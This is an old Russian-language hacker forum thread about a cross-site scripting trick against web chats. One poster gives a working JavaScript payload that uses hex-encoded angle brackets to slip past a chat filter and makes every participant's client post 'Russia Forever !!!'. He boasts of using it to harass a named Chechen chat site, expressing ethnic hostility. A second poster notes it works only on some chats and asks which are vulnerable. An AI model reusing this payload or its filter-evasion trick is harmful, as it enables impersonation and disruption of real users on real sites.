Чаты ответ

Discussion in 'Веб-уязвимости' started by Guest, 8 Apr 2003.

  1. Guest

    Guest Guest

    Reputations:
    0
    Algol, хЫх..а смысл в том, что просто угловые скобки не проходят, приходиЦЦа заменять их на хекс-код..и тогда все получаеЦЦа , а просто угловые скобки парсятся , что касаеЦЦа адреса чата, то лично я таким образом издевался на http://www.chechen.org/chat/index.php3
    уж не угодили мне чеченцы..такие фичи можно проделывать в принципе на любом чате такого типа.
    самолично отправлял такой скрипт, который от имени всех присутЦЦтвующих в чате писал "Russia-Forever!!!" вот он:

    \x3cscript language="JavaScript"\x3ewindow.parent.frames['input'].window.document.forms['MsgForm'].elements['M'].value="Russia Forever !!!";window.parent.frames['input'].window.document.forms['MsgForm'].submit()\x3b\x3c/script\x3e\x3c/font\x3e

    вот..удачи, как говориЦЦа, ежели опять что непонятно..спрашивайте
    отвечу с радостью
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Да, понятно, но это особенность именно этого чата, в большинстве чатов это не катит ...

    Если есть мысли по поводу в каких именно чатах это работает, и какова природа дырки - пиши